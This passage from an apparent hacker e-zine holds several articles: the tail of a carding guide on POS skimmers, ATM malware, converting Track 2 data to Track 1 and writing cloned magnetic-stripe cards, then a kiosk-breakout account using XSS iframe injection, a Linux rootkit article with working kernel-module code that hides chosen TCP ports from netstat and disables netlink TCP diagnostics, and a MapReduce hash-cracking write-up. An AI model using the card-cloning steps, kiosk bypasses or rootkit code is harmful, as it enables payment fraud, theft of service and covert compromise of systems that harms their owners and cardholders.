receiptwith all three track details, as well as PIN, or designed to save to file for later use. Theseskimmers are usually deployed in stores with the store owner's knowledge, as he/she may be forciblyissued to comply or offered a percentage of all money made. An attacker wishing to purchase a chipped/flashed POS terminal will expect to pay $1000. All dumpsare encrypted, with the seller holding the encryption key. This forces the buyer to return to theseller, send the encrypted file, and in return, receive only a percentage of the original skimmedcards. Alternatively, these skimmers can be bought out for as much as $3,000-10,000. [[ Obtaining Track Data Through Malware ]] --------------------------------------Although rare, ATM malware is an uprising issue among those in the carding community. After thesuccess of the Diebold Ghost trojan, there have been countless requests and confirmations ofdevelopment for malware designed on specific platforms, namely the Windows CE environment, afavourite among ATM systems. This malware will effectively log all read card data and PINs, printingthem to a file encrypted by the malware for later collection. Alternatively, some variants have evenoffered to print off all stolen credentials in a 'bank statement' format by using the ATM's printer.Needless to say, the deployment of this malware originates from an insider, usually employed orhired by the criminals to infect the ATM system from an ATM technician role.[[ Converting Track Data ]] -----------------------Track 2 Data will often appear in the following format:5281169568596016=14101010000045100001 ^ ^^ ^ ^--CVV| || |Card number _||_ Service code | | Field separator Expiration dateWhere:5281169568596016 = credit card number14 = expiry year10 = expiry month101 = service code451 = CVVTo generate Track 1 information from a Track 2 field, one must follow these simple steps:1. Add a 'B' before the credit card number.2. Replace the '=' with '^LASTNAME/FIRSTNAME^'.3. Add six '0's after the T2 data.Thus, our outputted Track1 data should read as follows:B5281169568596016^LASTNAME/FIRSTNAME^14101010000045100001000000[[ Writing Track Data ]] --------------------Once both Track 1 and Track 2 fields are complete, the data is ready for writing to the blankmedium. An attacker will ensure that the medium (magnetic stripe card) he/she selects is of highquality printing. Services offered typically cost around $15 per card. If the attacker is running alarge operation then he/she may even purchase the printing equipment themself. This is comprised of: - Hi-Co Magnetic Stripe PVC Cards - PVC Printer (Zebra printers are well known for this purpose) - PVC card embosser (to emboss credentials on the card) - PVC card tipper (to tip the embossing with silver/gold) - Signature Panels (on the reverse of the card, often left out by inexperienced carders) - Holograms (typically stickers or hot-roll stamps)The magnetic stripe medium MUST be Hi-Co. Hi-Co stands for High Coercivity. This is the magneticpower that allows the writing of data to occur on Hi-Co cards. All credit/bank cards will be Hi-Coand, thus, need the appropriate device to be written to. Any device capable of writing at thecoercivity of 4000 Oersted (Oe) on the appropriate tracks will be suitable. Note that most standardmagstripe readers can read Hi-Co cards; coercivity only comes into question in the writing process.The most common magnetic stripe Hi-Co writer is the MSR-206 and MSR-606. The supplied softwarepackages that come with these writers are extremely easy to operate, and it is only a matter ofcopying and pasting the Track 1 and Track 2 data into the blank track fields, hitting 'write', andswiping the blank card through the writer.[[ Cashing Track Data ]] --------------------After this initial attack is complete, the attacker has two options to produce profit:1. Form a crew to work with, willing to cash out this data. Higher risk of law enforcement, lower risk of being scammed by those you work with.2. Work with existing crews, often overseas. Lower risk of law enforcement, higher risk of being scammed by those you work with.Existing crews work on a percentage basis, normally offering a high percentage to the card supplier,and if cash out is successful, will either return that percentage through Western Union or run withthe money. Typically, 'test cards' will be exchanged in order for these crews to prove theirauthenticity.Forming a crew usually means a localized operation, susceptible to investigation from localauthorities before any foreign law enforcement bodies are involved. I believe most crews willoperate in this manner, a localised crew, often employed by a gang or mafia to supply card data totheir superiors for resale (such as those sold online) or cashed out by a second team. [[ Conclusion ]] ------------Through my experiences investigating the darker parts of the Internet, specifically carding andfraud, trends show that vendors of card data and/or information tend to be from a Russian source. Itis my belief that the operations involved in the obtaining and distribution of this information islargely mafia-based. I hope the information contained within this paper is enough to deter peoplefrom the 'carding scene' rather than to take an interest in it for personal gain. The peopleinvolved are generally small fish, but around every large forum I have visited there are people withconnections I'd dare not to cross.[==================================================================================================]-=[ 0x06 Brief Notes on Retail Kiosk Hacking-=[ Author: storm-=[ Email: storm@gonullyourself.org-=[ Website: http://gonullyourself.org/If you've ever left your basement and ventured outside to the real world, you've more than likelycome into contact with a kiosk at some point in a store or hotel. Most kiosks provide only alimited keyboard or run a very stripped down version of Windows, rendering certain actions difficultor impossible to directly achieve, but that only makes it all the more fun. This is no means anexhaustive article on hacking retail kiosks, but instead a list of little tips and tricks I'vecompiled through my own personal experiences that may either help you or provide inspiration whenapproaching a new device.In the MSP airport, there is a kiosk running software called SiteKiosk. The device providesInternet access at outrageous prices ($20/hour), although complimentary access to the airport'swebsite and Weather.com is so thoughtfully offered. As I sit typing this, my plane has been delayedabout 3.5 hours due to the torrents of snow outside, so I figured messing with the kiosk would giveme something to do other than eating candy and futilely waiting for the Boingo hotspot page to load.The keyboard is clunky and missing sensitive keys like Ctrl and Alt; the mouse is a trackball withtwo buttons, though the right-click button seems unresponsive. The web browser used by this kiosklooks very much like a version of Internet Explorer themed with cleaner icons, and the file bar andtaskbar are hidden from view.With buttons like Ctrl and Alt missing or disabled, we obviously can't try special key combinationslike Ctrl+Alt+Del, so the first step is to poke around what we can do with the software. The factthat we can access the airport's website and Weather.com is very curious, especially since theadvertisements load fine (which are hosted on third-party servers), yet putting anything in the URLbar pops up a "please insert monies" box. Luckily, Weather.com has an XSS in their quick lookup,so a simple search for zip code injects an IFrame intothe page, displaying our coveted search engine.When a kiosk disallows access to the URL bar, whether it's trying to contain the user to a singleweb site (think the online catalog at Staples stores) or reduce functionality (until the user forksup their money), XSS is a good place to start. It is common enough that even if you don't comeprepared with a known XSS in the target website, it's usually a trivial matter to find one on thespot. By injecting an IFrame, we gain the ability to browse any site we wish, as well as exerciseother web browser functionality that may escalate our access, provide opportunity to escalate ouraccess, or provide further information about the box.At this point, we have achieved free Internet access (within the IFrame), but there are moreinteresting things to do other than reading Reddit. A simple search for ha.ckers.org's iKat suiteleads us to a swiss army knife of tools to probe the system we're on.Through this, we learn that our user-agent is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;.NET CLR 2.0.50727; SiteKiosk 6.6 Build 213)We can browse the filesystem by invoking the "Browse" form field, but unfortunately lack of right-click doesn't let us easily open files and execute programs. If right-click were enabled, we wouldbe able to browse to C:\Windows\system32\cmd.exe within the prompt, right-click the program, andselect open to spawn a shell. Explorer.exe is also another good place to start. Once cmd.exe isopen, we would be able to manipulate the system, probe local files or scan the network, or kill thekiosk software using `tasklist` and `taskkill`.Unfortunately, the ability to view My Computer also seemed disabled. I did not spend a large amountof time probing the system or enumerating all of the tools provided by iKat, but I did discover theexistence of a file named trust-root.p7b on the Desktop which looked interesting, along with ashortcut to the SiteKiosk software.In a separate escapade, I was lucky enough to come across an Internet/printing kiosk in the lobby ofa Marriott hotel provided by a company called iBAHN. If I recall correctly, this too was runningSiteKiosk, but the interface looked very different than the kiosk I encountered in MSP, and itprovided a range of additional functions such as printing and access to Microsoft Office. Thedevice seemed to take great care not to give too much access to the user (the software provided itsown, more limited filesystem browser that was meant to open documents from flash drives), but itwasn't perfect. By opening Microsoft Word, you could access Windows Explorer through the File menuor navigating the help bar in online mode, right-clicking and selecting "View Source". This wouldinvoke Notepad with a File menu of its own. Viewing My Computer only showed the CD drive and USBstick that was currently plugged in, but it was possible to access C:\ simply by typing it in thenavigation bar.There are plenty of kiosks around to play with, and many of them possess blatant holes in theiraccess restriction software. Even if there is nothing inherently interesting on the device, itmight be a good idea to check if it's connected to the network or if it dials home anywhere. Justin general, it's fun to circumvent the software and snoop about the device, and of course thingslike free Internet are always cool too. Some devices I've seen think they are clever, or are justunstable, so working or reliable methods of accessing certain kiosks, such as the ones in Barnes &Noble, are still to be determined. For instance, attempting to XSS the B&N website from their in-store kiosk results in the device locking up and calling for employee assistance. Other devicesdisable right-click, removing certain escalation opportunity and the ability to access criticalfunctionality necessary for an attack.There is still much fun to be had, so if you have any tips, tricks, or your own kiosk-hackingstories, drop us a message and your submission might just be in the next zine.[==================================================================================================]-=[ 0x07 Linux Rootkit Development Update-=[ Author: duper-=[ Website: http://projects.ext.haxnet.org/~super/In the Linux kernel version 2.6.36, some changes to the procfs API will break the interface thatpreviously existing rootkits have with /proc/net/tcp. This is a critical change as far as rootkitfunctionality goes, since a new technique is required to hide TCP ports from userland administrationprograms such as netstat(8) and other network statistics gathering tools. Thanks to fawx forinitially bringing this issue to my attention.As a side note: If you have any questions about the intricacies of the Linux kernel, as we will beworking closely with it throughout the course of this paper, consult /usr/src/linux/Documentation orany of the links provided as references at the bottom.Prior to release of the 2.6.36 patch, most Linux rootkits utilized a sequential search of theproc_net->subdir linked list to locate the procfs data structure corresponding to the filesystempathname /proc/net/tcp. The way that entries in the /proc/net directory are accessed changed in2.6.36, and as a result the majority of publicly available Linux rootkits featuring TCP connectionhiding stopped compiling; some benign networking drivers ceased to function as well. The API wasn'tchanged in order to safeguard against rootkits -- that was only an unintended side effect. In reality, implementing a kernel-mode TCP data filtering mechanism is even easier with the newinterface. A new kernel function is dedicated specifically to the purpose of initializing the/proc/net/tcp file. Note that I'm using the term "file" loosely in this context, as procfs doesn'tbehave like a typical filesystem that utilizes disk-based storage. In userland, when a filedescriptor corresponding to a procfs pathname is read(), the results are actually custom-formattedkernel data objects. That's why /proc/net/tcp and, in fact, the majority of procfs pathnames, appearas empty files when the stat() system call is executed on them. Although procfs files do haveinodes, their values approach 2**32 (the upper limit for ino_t), and thus they are outside the rangeof use for partitioned disk filesystems. Observe the differences in output between the following twocommands:$ stat /proc/net/tcp File: `/proc/net/tcp' Size: 0 Blocks: 0 IO Block: 1024 regular empty fileDevice: 3h/3d Inode: 4026531957 Links: 1Access: (0444/-r--r--r--) Uid: ( 0/ root) Gid: ( 0/ root)Access: 2011-02-19 12:16:32.853287891 -0500Modify: 2011-02-19 12:16:32.853287891 -0500Change: 2011-02-19 12:16:32.853287891 -0500 Birth: -$ stat /bin/ls File: `/bin/ls' Size: 109736 Blocks: 224 IO Block: 4096 regular fileDevice: 303h/771d Inode: 7660308 Links: 1Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)Access: 2010-12-25 23:33:12.000000000 -0500Modify: 2010-12-24 12:18:47.000000000 -0500Change: 2010-12-24 12:19:01.000000000 -0500 Birth: -As you can see, the procfs pathname has a rather large inode number and a file size of 0, despitethe fact that we would receive data back if we ran `cat` against it. In the preceding examples, the/usr/bin/stat binary (provided by the GNU coreutils package) executed the fstat() system callagainst the the absolute pathnames given as arguments. In this next typescript, statfs() will be rundue to the "-f" command line option, which is an abbreviated form of the getopt_long() option"--file-system", as documented in the stat(1) man page and GNU info pages. $ stat -f /boot File: "/boot" ID: f6c5e14bf02df87f Namelen: 255 Type: ext2/ext3Block size: 1024 Fundamental block size: 1024Blocks: Total: 32175 Free: 11084 Available: 9423Inodes: Total: 8320 Free: 8266$ stat -f /proc File: "/proc" ID: 0 Namelen: 255 Type: procBlock size: 4096 Fundamental block size: 4096Blocks: Total: 0 Free: 0 Available: 0Inodes: Total: 0 Free: 0Clearly, procfs is special since the majority of its statistical information is zeroed out. Theglaring contrast in block size results from extfs handling disk blocks, whereas procfs handlesmemory, as stated previously. On my x86-64 kernel, getpagesize() from unistd.h returns 4096.However, page size is platform independent, so your mileage may vary. Note that sysfs behaves in amanner identical to procfs according to statfs(). If your kernel is configured to support sysfs,you'll find it listed under /sys in your /etc/mtab. The directory that rootkit developers wouldprobably want to concern themselves the most with is /sys/kernel. Again, depending on your/usr/src/linux/.config or /proc/config.gz settings during the kernel's compile-time, varioussubdirectories could be available under /sys/kernel. My machine has the debug, security, and mm(memory manager) directories enabled currently. Now that we've gotten the basics squared away, let'stake a look at a rootkit..struct proc_dir_entry *proc_find_tcp(){ struct proc_dir_entry *p = proc_net->subdir; while (strcmp(p->name, "tcp")) p = p->next; return p;}This is from adore-ng-0.56, a rootkit I downloaded from packetstormsecurity.org. The code aboveshows the tediousness involved in accessing pathnames under the /proc/net directory. Since thekernel didn't have any direct access functions defined, it became necessary to loop over thedirectory entries manually. The last kernel version to be supported by this particular adore-ngrelease appears to be 2.6.16, judging by some conditional preprocessor directives within the source:#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,16)MODULE_PARM(root_fs, "s");MODULE_PARM(proc_fs, "s");MODULE_PARM(opt_fs, "s");#elsemodule_param(root_fs, charp, 0644);module_param(proc_fs, charp, 0644);module_param(opt_fs, charp, 0644);#endifIt looks as if prior to 2.6.16 there was less convenient syntax available for those developingLoadable Kernel Modules (LKMs). At the time of writing this article, the latest stable Linux kernelis 2.6.37.1. However, I'll be using gentoo-sources-2.6.37 from the Gentoo portage tree. For the sakeof consistency, let's double check the current kernel versions:$ finger @kernel.org[kernel.org]The latest linux-next version of the Linux kernel is: next-20110218The latest snapshot 2.6 version of the Linux kernel is: 2.6.38-rc5-git5The latest mainline 2.6 version of the Linux kernel is: 2.6.38-rc5The latest stable 2.6.37 version of the Linux kernel is: 2.6.37.1The latest stable 2.6.36 version of the Linux kernel is: 2.6.36.4The latest longterm 2.6.35 version of the Linux kernel is: 2.6.35.11The latest stable 2.6.35 version of the Linux kernel is: 2.6.35.9The latest longterm 2.6.34 version of the Linux kernel is: 2.6.34.8The latest stable 2.6.34 version of the Linux kernel is: 2.6.34.7The latest longterm 2.6.32 version of the Linux kernel is: 2.6.32.29The latest stable 2.6.32 version of the Linux kernel is: 2.6.32.28The latest longterm 2.6.27 version of the Linux kernel is: 2.6.27.58The latest stable 2.6.27 version of the Linux kernel is: 2.6.27.57The latest stable 2.4.37 version of the Linux kernel is: 2.4.37.11In 2.6.36, the pointer to the global proc_net structure variable (seen in the adore-ng-0.56 codeabove) disappeared. After grepping around through the kernel source code a bit, I realized that thefunctionality had been so heavily modified that I wasn't sure where to hook into /proc/net/tcp from.I was able to grep /boot/System.map for procfs-related symbols and realized it was going to be a loteasier than I thought. I found a tcp_proc_register function that allowed me to re-create/proc/net/tcp. Also, the proc_net structure that was being referenced by adore-ng had now becomeinit_net. So, I simply deleted the existing /proc/net/tcp with proc_net_remove and re-initialized itwith the address of a custom struct (just to clarify, we are right now working inside the kernel):static struct tcp_seq_afinfo tcp4_seq_afinfo = { .name = "tcp", .family = AF_INET, .seq_fops = {.owner = THIS_MODULE}, .seq_ops = {.show = new_tcp4_seq_show}};To understand what's going on here, one needs to realize that procfs makes itself appear to userlandas any other filesystem would. It exposes various functions for operating on the files anddirectories themselves, e.g., open, read, readdir, seek, etc. That's where the new_tcp4_seq_showfunction comes in. The relative pathname to the file where the real tcp4_seq_show is defined isnet/ipv4/tcp_ipv4.c (as documented by Documentation/networking/proc_net_tcp.txt). Thenew_tcp4_seq_show function is a malicious wrapper which invokes the legitimate tcp4_seq_showfunction, unless it's determined that the TCP connection currently being processed by a readoperation on /proc/net/tcp corresponds to a port number that is intended to be hidden by therootkit. In that case, new_tcp4_seq_show will not construct the usual hexadecimal-encoded stringthat describes the connection. static int (*old_tcp4_seq_show)(struct seq_file *seq , void *v) = 0;// Array initialization syntax must be zero-terminatedstatic const unsigned short hidden_ports[] = {6666, 7777, 888, 999, 0};static int new_tcp4_seq_show(struct seq_file *seq, void *v){ const signed int retval = old_tcp_seq_show(seq, v); register unsigned short i = 0; static unsigned int line = 0; auto char hex_port[8] = { 0 }, *offset = seq->buf + seq->count - NET_LINE; if(v == SEQ_START_TOKEN) return line = 0, retval; for(i = 0;hidden_ports[i];i++) { sprintf(hex_port, ":%04X", hidden_ports[i]); if(strstr(offset, hex_port)) return seq->count -= NET_LINE, retval; } sprintf(offset, "% 4i", line++); return offset[4] = ':', retval;}The old_tcp_seq_show identifier is simply a function pointer to the original tcp4_seq_show functionthat was assigned to the .seq_ops member of the tcp_seq_afinfo structure, whose definition was shownabove. To reiterate, our new_tcp4_seq_show function is wrapping the real tcp4_seq_show function. Theintroduction of our wrapper function to the traditional kernel control flow effectively hidescertain ports from userland by looping over an array that contains the rogue port numbers. In thisway, running a command such as netstat will not display the TCP connections that have been hiddenfrom /proc/net/tcp. The hidden_ports array is specified with the C language keywords "static" and "const." These preventthe initialized port numbers from being accessed from outside of the current source file and fromhaving the values modified after compilation. Also, the hidden_ports array is defined to be of type"unsigned short" because the source and destination port fields in TCP packet headers are non-negative and 16 bits wide. Section 3.1 of RFC793 demonstrates this with an ASCII art representation. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Now, to formally register our new /proc/net/tcp mechanisms, we first remove the original, then passpointers to the data structures representing the /proc/net directory and our new tcp entry withinit. Simply invoke the appropriate functions when initializing the Loadable Kernel Module. Themodule_init macro tells the compiler which function to execute when using insmod on the compiled .ko(kernel object) code file.static int __init init_hidetcp(void){ proc_net_remove(&init_net, "tcp"); tcp_proc_register(&init_net, &tcp4_seq_afinfo); return 0;}module_init(init_hidetcp);Let's go ahead and test it out to make sure everything works. After compiling the rootkit itselfwith GNU make and inserting the module into the kernel, we'll use netstat with the "-tW" commandline flags so only TCP connections are displayed and the wide display format will allow us to viewDNS hostnames in their entirety. One of the hidden port numbers we defined in the hidden_ports arraywas 7777 so let's see if netstat detects a connection on that port. $ gmake$ insmod hidetcp.ko$ telnet us.undernet.org 7777Trying 208.83.20.130...Connected to us.undernet.orgEscape character is '^]'.^]telnet> z[1]+ Stopped telnet us.undernet.org 7777$ netstat -tWActive Internet connections (w/o servers)Proto Recv-Q Send-Q Local Address Foreign Address Statetcp 0 0 alien.localdomain:51889 please.dont.hacktheinter.net:6697 ESTABLISHED$ So far, we've seen how to hide TCP connections to or from certain port numbers from userlandprograms that read from procfs. However, there's another way to access information about TCPconnections using rtnetlink(3). You can determine if a given program is using procfs or a netlinkprotocol by tracing for the respective function calls. $ whatis netlinknetlink (3) - Netlink macrosnetlink (7) - Communication between kernel and userspace (AF_NETLINK)$ strace -fe trace=open,socket netstat -tW 2>&1 > /dev/null | egrep -i '(tcp|netlink)'open("/proc/net/tcp", O_RDONLY) = 3open("/proc/net/tcp6", O_RDONLY) = -1 ENOENT (No such file or directory)$ strace -fe trace=open,socket ./ss 2>&1 > /dev/null | egrep -i '(tcp|netlink)'socket(PF_NETLINK, SOCK_RAW, 4) = 3The ss binary being traced above is a piece of code distributed with iproute2 that retrieves socketstatistics. Iproute2 has a Wikipedia article at http://en.wikipedia.org/wiki/Iproute2 with somehelpful links to get you up to speed.Some have probably noticed that the raw socket option is succeeding despite the fact that my currentprompt setting reflects that of a non-root user. Since the PF_NETLINK integer constant is the firstargument instead of PF_INET, the kernel has no issue with providing a positive return value. Please note that rtnetlink isn't the only netlink protocol in existence -- there are many more; fartoo many to mention here. There have been many academic research papers published on the subject ofnetlink over the past decade or so. One of the latest and most interesting is entitled"Communicating between the kernel and user-space in Linux using Netlink sockets" by Ayuso, Gasca andLefevre. The types of security-related operations it's capable of performing alone are extremelycomprehensive. For instance: detecting and mitigating DDoS attacks, subliminal channels betweenprocesses with disparate privileges, multicasting a single communications channel to multiple systemusers, implementing a dynamic routing protocol like Open Shortest Path First in userland, detectingnetwork interfaces with promiscuous mode enabled, etc. In this particular scenario, usage of only a specific aspect of netlink is necessary to accomplishthe final goal of TCP connectivity that's as low-key as possible. Since connections hidden from/proc/net/tcp can still be viewed via the netlink socket interface, another technique must be usedto avoid such disclosure. Here's another example typescript (`man script`) of the ss program fromthe misc directory in iproute2's source tree as it executes on the standard output stream:$ ./ssState Recv-Q Send-Q Local Address:Port Peer Address:PortESTAB 0 0 192.168.1.100:56921 72.14.204.147:80ESTAB 0 0 192.168.1.100:51237 184.27.36.110:22In this case, the two TCP sockets listed are both in a connection established state. The four emptymessage queue values being shown mean that the kernel has delivered all pending data transmissionsto and from the socket as of the current runtime. The code that handles Internet diagnosticsmonitoring for the Linux kernel's rtnetlink protocol is located in /usr/src/linux/net/ipv4/inet_diag.c,and /usr/src/linux/include/linux/inet_diag.h is of course the associated header file. TCP-specificcode is located elsewhere. However, we can simply disable all TCP socket diagnostics withoutreferencing any of the tcp_inet_diag oriented source files. The following short code snippetinserted into the rootkit module's initialization function is sufficient to prevent netlink fromutilizing any TCP socket monitoring methods whatsoever:static struct inet_diag_handler h;h.idiag_type = TCPDIAG_GETSOCK;inet_diag_unregister(&h);Don't forget to include linux/inet_diag.h. Now iproute2's ss binary won't output any TCP connectionsat all, since the handler responsible for the message type it was processing has now been removed.It works, but it would be even better by only allowing Internet socket diagnostics for connectionswhose source and destination port numbers don't match our blacklist. The full inet_diag_handlerstructure must be filled out, and inet_diag_register should be invoked as well. This is similar topassing the tcp_seq_afinfo structure to tcp_proc_register as outlined in the previous technique. Abrief outline tracing nested structure members back to actual port values follows. However, puttingthat concept into compilable rootkit source code form will be left as an exercise for the reader. include/net/inet_sock.h112 struct inet_sock {113 __be16 inet_dport;114 __be16 inet_sport;115 }include/net/inet_connection_sock.h 86 struct inet_connection_sock { 87 /* inet_sock has to be the first member! */ 88 struct inet_sock icsk_inet;include/linux/tcp.h292 struct tcp_sock {293 /* inet_connection_sock has to be the first member of tcp_sock */294 struct inet_connection_sock inet_conn;net/ipv4/tcp_diag.c 20 static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r, 21 void *_info) 22 { 23 const struct tcp_sock *tp = tcp_sk(sk); For more information on Linux kernel development, check out: - The Linux Kernel Newbies site http://kernelnewbies.org/ - The linux-kernel mailing list FAQ http://www.tux.org/lkml/ - The Linux Kernel Hackers' Guide from the Linux Documentation Project http://tldp.org/LDP/khg/HyperNews/get/khg.html (highly recommended) - And, of course, the main Linux Kernel Archives site http://kernel.org[==================================================================================================]-=[ 0x08 High Performance Hash Cracking with MapReduce, Part 2-=[ Author: elchupathingy-=[ IRC: irc.gonullyourself.org #gny/----------------------------------------------------------------------------------------|| Introduction| The last article talked about the basic theory of MapReduce and a few examples of how it can beused. The options for MapReduce are not limited to those mentioned, but they are the easiest onesto understand the concept of breaking up larger tasks and passing this information on to othernodes. For this article, we will focus more on the code aspect of MapReduce instead of the higher-level concepts./----------------------------------------------------------------------------------------|| Background| The very basic implementation of MapReduce shown here is something that can be expanded uponeasily. It provides the method of automatic data pre-processing and automatic post-processing.But, being a simple implementation, there are problems with some of the mechanics inside the code.Though, that is left to someone else to fix. By familiarizing yourself with the algorithm, andstepping through the code, it should be a trivial manner to have yourself a fully functioningMapReduce implementation./----------------------------------------------------------------------------------------|| Theory| To recap: The idea behind MapReduce is quite simple to grasp, but its layout is detailed and maylead to confusion at times. Here is a look at a typical layout of a MapReduce network: /----------------------------------------------\ /------\ | | | | | | |Master|----/ /------\ /------\ /------\ /------\ /------\ \------/ |Mapper| |Mapper| |Mapper| |Mapper| |Mapper| \------/ \------/ \------/ \------/ \------/ | | | | | | | | | | /-------\ /-------\ /-------\ /-------\ /-------\ |Reducer| |Reducer| |Reducer| |Reducer| |Reducer| \-------/ \-------/ \-------/ \-------/ \-------/ | | | | | \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \ | / / \ \|/ / \ | / \-----------------/ | /---------\ |Answer!!!| \---------/ Now that's a picture. This network layout has two key characteristics to it: 1) Series of Mappers 2) Series of Reducers These two things are the meat of the MapReduce concept. Now, what exactly is MapReduce? It'sformally defined as the following: /------------------------------------------------------------------------------------ |MapReduce is a framework for processing huge datasets on certain kinds of |distributable problems using a large number of computers (nodes), collectively |referred to as a cluster. Computational processing can occur on data stored either |in a filesystem (unstructured) or within a database (structured). | - Wikipedia Now that that's out of the way, lets move onto real code and see how this works in the given implementation. Firstly, what software is providing the backend infrastructure? The implementation relies on the following: Web server: Apache or whatever you have as long as it supports PHP. MySQL That's it. The clients run from php-cli but can also be called by the web server if desired. The MySQL tables that the scripts interact with are very simple: /------------------------------------------------------------------------------------ | CREATE TABLE IF NOT EXISTS `node` ( | `id` varchar(32) NOT NULL, | `type` int(11) NOT NULL, | `job_id` varchar(32) NOT NULL, | `last_connect` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, | UNIQUE KEY `id` (`id`) | ) ENGINE=MyISAM DEFAULT CHARSET=latin1; | | CREATE TABLE IF NOT EXISTS `job` ( | `id` varchar(32) NOT NULL, | `status` int(11) NOT NULL, | `time_added` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, | `mappers` int(11) NOT NULL, | `reducers` int(11) NOT NULL, | `time_started` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00', | PRIMARY KEY (`id`) | ) ENGINE=MyISAM DEFAULT CHARSET=latin1; | These tables provide the necessary framework for this given implementation, while demonstratingsimple MapReduce structure in an obvious yet functional manner. Should MapReduce be used in aproduction environment, a more efficient, scientifically-designed framework should be used. Highperformance applications should most likely not be using an interpreted language, additionally. Obviously, these tables are of no use without the scripts that interact with the database. Themain script that facilitates this interaction is 'stat.php'. It provides a vector for the nodes totalk with the master, in most cases, it keeps track of the nodes' last connect time and assigns thejob of either 'mapper' or 'reducer' to each. The code is straightforward, and the source codeshould be relatively self-explanatory by scanning over it. So, the next step is to determine themethod of relaying data between master and node. The data is structured in EL markup files, whichlook suspiciously similar to existing markup languages like HTML and XML: /------------------------------------------------------------------------------------ | | ec366edc8a513f467af89f2e5cd9f37a | SET | | 85103e20ac8441af181b15f58fc53b08 | | | The "id" tag contains the ID of the node. The "type" tag tells the node to perform a specificaction, in this case, to set its "job_id" to the payload. The "payload" tag holds the data thatwill be assigned to a variable stored on the node. It is named such that the variable is assignedcorrectly. In this particular packet, the information between the opening and closing "payload"tags is an MD5 hash, though it does not always have to be. However, protocol defines that thepayload must only be alphanumeric (only contains numbers or letters). If the "type" tag is set to"FILE", then the payload should be treated as Base64-encoded data. This protocol is simple butallows for easy parsing and greater flexibility. Here is an example handshake performed between node and master. This handshake is initiated bya node upon startup to seek new jobs: /---------------------------------------------------------------------------------------------\ |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=starting| \---------------------------------------------------------------------------------------------/ | | /-------------------------------------------------\ | | | ec366edc8a513f467af89f2e5cd9f37a | | REQUEST |-----------------------\ | | | \-------------------------------------------------/ | | | /--------------------------------------------------------------------------------------------\ |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=whatami| \--------------------------------------------------------------------------------------------/ | | /-------------------------------------------------\ | | | ec366edc8a513f467af89f2e5cd9f37a | | SET | | | | reducer |-----------------------\ | | | | | | \-------------------------------------------------/ | | | /--------------------------------------------------------------------------------------------\ |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=looking| \--------------------------------------------------------------------------------------------/ | | /-------------------------------------------------\ | | | ec366edc8a513f467af89f2e5cd9f37a | | SET | | | | 85103e20ac8441af181b15f58fc53b08 | | | | | \-------------------------------------------------/ Once the node has received a job, it will send another request to the master for the script anddata files. The job files, which contain the split up work, are then stored in a folder specific tothat job_id. To retrieve jobs files from the folder, the follow script is used: /------------------------------------------------------------------------------------ |#job_chunks.php |$dir = opendir( "./chunks/$job_id" ); | |if( $dir ) |{ | do | { | $thing = readdir( $dir ); | | if( $thing == FALSE ) | { | rmdir( "./chunks/$jobs_id" ); | die; | } | | if( $thing == "." || $thing == ".." ) | continue; | else | break; | | }while( true ); | | if( $thing && $thing != "." && $thing != ".." ) | { | $output = " \r\n"; | $output .= "\t $id \r\n"; | $output .= "\t FILE \r\n"; | $output .= "\t \r\n"; | $output .= "\t\t".base64_encode( file_get_contents( "./chunks/$job_id/$thing" ) )."\r\n"; | $output .= "\t \r\n"; | $output .= " "; | unlink( "./chunks/$job_id/$thing" ); | closedir( $dir ); | echo $output; | } |} | This code grabs the next chunk from the directory and wraps it as a EL packet, where the outputis then sent to the node. From here, mapper nodes will process this chunk of data and start a small, one-time use webserver. The reducer nodes request the IP:PORT of a mapper node, grabbing the result. After doingso, they further process the data and upload their results to the master. The master does a final reduction step on the reduced results and produces a final, usableresult that is downloaded by the administrator. Although very much functional, the implementation that is given with this article possesses afew inherent issues: 1) If a node does not complete a job, then that node's results are lost. 2) There is no redundancy of nodes. 3) The code as a whole was not written with security in mind. Testing should only be performed on a private network. 4) It uses HTTP to transfer messages, which makes the code easy to write in exchange for introducing an enormous amount of overhead. 5) Speed gains from distributing the cracking process among multiple nodes is negated by the fact that nodes request chunks more quickly than other nodes are able to download them, resulting in multiple nodes receiving the same chunk. Requesting a chunk is not a "blocking" operation. This resulted in a dirty code hack using random sleep times. With that being said, this project still serves as a good learning tool to those interested inthe MapReduce algorithm. Download the source package for this article: http://www.gonullyourself.org/zine/4/MapReduce.tar.gz MD5sum: d985ffa4b2fcd63d2a6275697acf252e SHA1sum: fb798594216e87b51fd194db1a31e580ebe47a7d A few things need to be done first before testing this code. First, the config.ini files shouldbe updated to point to the URL of your web server and the folder the MapReduce code is installed in.The default is "http://127.0.0.1/map_reduce_zine". Once the configs have been updated correctly,the nodes are ready to run; however, the master must be set up first. Import and create the tablesin map_reduce.sql. To make sure the master runs without problems, just be lazy and chmod 777 allthe directories. For what we're doing, it really doesn't matter. Now, all the configurations arecomplete. To test the MapReduce cluster, initialize two or more nodes locally by running the"client.php" file in each of the "testing" folders. Once they are running, they will begin to pollthe master for work. To add a job to the cluster, navigate to "add_job.php" in your browser. From here, add thecorresponding files from the "example" directory. Once a job is added, the nodes will automaticallygrab the work script and any data needed to perform the job. Once the nodes are done with theirwork, they will begin to poll for new jobs. The example scripts and data are to find the plain textstring "elchupathingy" from the hash in the "node_script.php". To see if it worked, browse to"show_results.php" and select the link there; it will run the "post-process" script and, in thiscase, display the plain text. lata, ELChupathingy[==================================================================================================]-=[ 0x09 